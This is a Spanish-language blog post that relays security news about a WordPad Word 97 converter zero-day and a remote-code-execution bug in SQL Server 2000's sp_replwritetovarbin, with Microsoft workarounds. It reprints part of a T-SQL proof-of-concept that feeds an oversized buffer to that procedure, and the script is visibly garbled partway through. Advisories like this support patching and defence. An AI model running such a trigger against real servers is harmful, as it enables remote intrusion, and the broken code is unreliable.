Pasemos a ver de que se trata :
0 exploit que afecta WordPad Text Converter
Microsoft confirmo que se encuentra investigando un zero day exploit. Esta vulnerabilidad afecta a WordPad Text Converter para Word 97 files en Windows 2000 Service Pack 4, Windows XP Service Pack 2, Windows Server 2003 Service Pack 1, y Windows Server 2003 Service Pack 2.
Microsoft dice que Windows XP Service Pack3, Vista y Serve 2008 no son afectados.
Segun Microsoft, esta vulnerabilidad requiere que el usuario abra un attachment o un archivo que arranque Wordpad. Si Microsoft Word esta instalado en el sistema, la vulnerabilidad no tiene efecto a menos que el archivo tenga una extension Windows Write (.wri), el cual lanzaría Wordpad.
Creo que alguien que sea lo medianamente inteligente para explotar esta vulnerabilidad, salvaría los archivos como .wri...
Hasta el momento Microsoft no informo como actuara en este caso, si por medio de un patch fuera de ciclo o esperara hasta el próximo update dentro de exactamente un mes.
Workarounds
Microsoft has tested the following workaround. Although this workarounds will not correct the underlying vulnerability, it helps block known attack vectors. When a workaround reduces functionality, it is identified in the following section.
Disable the WordPad Text Converter for Word 97 file format |
Se encontro una vulnerabilidad en Microsoft's SQL Server 2000que le permite a un atacante ejecutar codigo en forma remota en el server.
De acuerdo a SEC Consult la causa del problema es un bug en el manejo de la memoria del programa.
Este codigo fue producido por SEC Consult para verificar el problema :
The following T-SQL script can be used to test for the vulnerability:
--------------------------------
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT
SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
@end_offset output,
@vb_buffer output,
@vb_bufferlen output,'''
SET @val = CHAR(0x41)
SET @counter = 0
WHILE @counter < counter =" @counter" buf =" @buf" buf =" @buf">
Workaround:Segun Microsoft el patch esta preparado, pero aun no hay informacion sobre el momento del lanzamiento.
-----------
Remove the sp_replwriterovarbin extended stored procedure.
Run the following as an administrator:
execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'
See also:
"Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx
Fuente : heise-online
No comments:
Post a Comment